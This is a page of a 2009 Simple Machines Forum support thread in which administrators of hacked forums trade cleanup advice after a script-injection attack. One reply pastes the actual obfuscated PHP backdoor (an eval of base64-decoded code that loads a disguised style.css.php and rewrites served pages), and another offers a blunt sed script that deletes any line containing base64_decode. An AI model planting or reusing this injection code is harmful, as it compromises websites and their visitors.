Advertisement:

Author Topic: Hacked, script injection  (Read 248173 times)

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #320 on: May 22, 2009, 09:26:17 AM »
Just to mention, I realized now, that yesterday, afte I deleted kris and removed all avatars and upgrade to 1.1.9. it worked, but today it doesn't, and nothing I upload shows on my server in attachment dir. So obviously I didn't clean everything. Please help

Offline ConquerorOfMankind

  • Semi-Newbie
  • *
  • Posts: 11
Re: Hacked, script injection
« Reply #321 on: May 22, 2009, 10:31:51 AM »
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #322 on: May 22, 2009, 12:36:33 PM »
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Yes....It worked yesterday.

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #323 on: May 22, 2009, 01:13:45 PM »
I just wanted to delete SMF gallery an unnistal failed in:
4.     Execute Modification     ./Sources/ManagePermissions.php     Test failed
5.    Execute Modification    ./Themes/default/index.template.php    Test failed

So I checked those 2 files, and saw this:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy92aG9zdHMvemJvcmlzdGUuY29tL2h0dHBkb2NzL2ZvcnVtL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy9iYmMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy92YXIvd3d3L3Zob3N0cy96Ym9yaXN0ZS5jb20vaHR0cGRvY3MvZm9ydW0vVGhlbWVzL2NsYXNzaWMvaW1hZ2VzL2JiYy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

But even when I delete that I can't uninstall gallery without tes failed.

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,122
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #324 on: May 22, 2009, 01:28:17 PM »
the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #325 on: May 22, 2009, 01:41:38 PM »
the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

I'm trying to unistall....Problem is I see code (already mention here...eval base64...and so on) on more files, and I have a lot of mods installed. I was hoping that 1.1.9 will fix that, but now I'm not sure what to do?
Start deleting those lines manualy? Leave everything? Restore base? Delete everything and start over? (hope not)

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,122
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #326 on: May 22, 2009, 02:12:02 PM »
If you have a backup from before the attack, then use that... (if you don't, then I suggest that you start keeping one)

Otherwise, take the full install package of SMF 1.1.9, save the Settings.php file on your local computer and delete all PHP files from your forum directories.   The reload the forum files using the install package... delete the install files and copy your saved version of Settings.php (after making sure that it is clean)

You now have your forum reset to a clean state and you can re-apply mods as needed.
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline ellion

  • Jr. Member
  • **
  • Posts: 203
Re: Hacked, script injection
« Reply #327 on: May 22, 2009, 05:03:43 PM »
i just went through my DB to check for theme_dir entries and i found the follwoing entries.
Code: [Select]
 
249  32  theme_dir  ./attachments/avatar_249.gif\0
280 32 theme_dir ./attachments/avatar_280.jpg�
488 32 theme_dir ./attachments/avatar_488.jpg�
the first column of numbers are the member id the id 488 is kris barteo.

should i delete ethese entries?
« Last Edit: May 22, 2009, 05:20:27 PM by ellion »

Offline Sarge

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,209
  • Gender: Male
    • Zëri YT!
Re: Hacked, script injection
« Reply #328 on: May 22, 2009, 05:14:48 PM »
What are the names for the other IDs?
    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting

Offline WHK

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #329 on: May 22, 2009, 07:21:44 PM »

Offline JBlaze

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 12,152
    • @fragicide on Twitter
Re: Hacked, script injection
« Reply #330 on: May 22, 2009, 07:32:15 PM »

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,122
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #331 on: May 22, 2009, 07:47:50 PM »
ok... rather than post a link to a spanish forum with a relatively useless comment, care to tell use what they claim the bug in 1.1.9 is?
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline FinsandFur

  • Jr. Member
  • **
  • Posts: 184
Re: Hacked, script injection
« Reply #332 on: May 24, 2009, 02:53:58 AM »
I've got another forum that he hit.
I scanned through most of what you folks got here, but couldn't bring myself to read all 17 pages :-\

Basically, I'm just bringing ya's some more info to the table.

The said forum was for a client I just took over the maintenance duties last week.
They were on 1.1.7 at the time of the hack, which was Jan18th, 09
The path he chose was relatively easy to follow looking at last modified dates through SSH.

He also added a php file to the Packages directory titled "tvax.php" that was heavily infected. I DO have that file zipped if anyone wants to analyze it.


Offline Daniel15

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 4,221
  • Gender: Male
  • http://dan.cx/
    • daaniel on Facebook
    • Daniel15 on GitHub
    • daniel15 on LinkedIn
    • @Daniel15 on Twitter
    • Daniel15
Re: Hacked, script injection
« Reply #333 on: May 24, 2009, 05:28:40 AM »
I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
Code: [Select]
#!/bin/bash
find /directory_name '*.php' -type f | while read FILE
do
sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Thanks for the script, saved me a whole heap of time cleaning an infected forum. :)
Now to clean the random junk it left behind >_<
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!

Offline agridoc

  • SMF Hero
  • ******
  • Posts: 3,274
  • Gender: Male
    • Aeromodelling GR - Aeromodelling in Greece
Re: Hacked, script injection
« Reply #334 on: May 24, 2009, 05:52:36 AM »
Altough I did some work with SHH commands, I finally cleaned my files by creating a zip file with SHH, containing all PHP files in my domain
Code: [Select]
zip -R filename '*.php'Then cleaned them with Search & Replace Master, an excellent freeware tool, I really liked it, then FTP in my site.

It's useful to have a file with the injected code. See here how to use it for finding the directory with style.css.php and s.php
http://www.simplemachines.org/community/index.php?topic=307717.msg2060807#msg2060807
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

Offline Ratiomaster

  • Newbie
  • *
  • Posts: 7
Re: Hacked, script injection
« Reply #335 on: May 24, 2009, 02:09:52 PM »
I've made a php script that will clean all infected files on your server (attached)
Just put it in the root directory and it will search and remove junk line from all php's recursively.

Btw, is there other problems caused by this hack ? Like does it install some backdoors that need to be removed as well ?

Offline Dzonny

  • Lead Localizer
  • SMF Super Hero
  • *
  • Posts: 11,617
  • Gender: Male
  • No sleep...
    • dzontra.nikola on Facebook
    • Dzonny on GitHub
    • dzontranikola on LinkedIn
    • @opusteniforum on Twitter
    • Samo opusteno
Re: Hacked, script injection
« Reply #336 on: May 25, 2009, 02:57:02 PM »
Really, that is very good work Ratiomaster...
Anyone fixed forum with this tool ??

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #337 on: May 25, 2009, 04:48:29 PM »
I've made a php script that will clean all infected files on your server (attached)
Just put it in the root directory and it will search and remove junk line from all php's recursively.

Btw, is there other problems caused by this hack ? Like does it install some backdoors that need to be removed as well ?

Greattt! I'm clean now, but this will be on my reserves!!!

Offline aly22

  • Semi-Newbie
  • *
  • Posts: 39
Re: Hacked, script injection
« Reply #338 on: May 25, 2009, 06:50:28 PM »
if I already deleted user kristabero how do I know if the avatar has been left behind please?

Offline aly22

  • Semi-Newbie
  • *
  • Posts: 39
Re: Hacked, script injection
« Reply #339 on: May 25, 2009, 10:44:34 PM »
Anyone tried the cleanup script? I don't want to be skeptical, and it scans clean ... but with all I've cleaned up manually over the past week, I am timid of installing/running anything without some assurance it works. Thx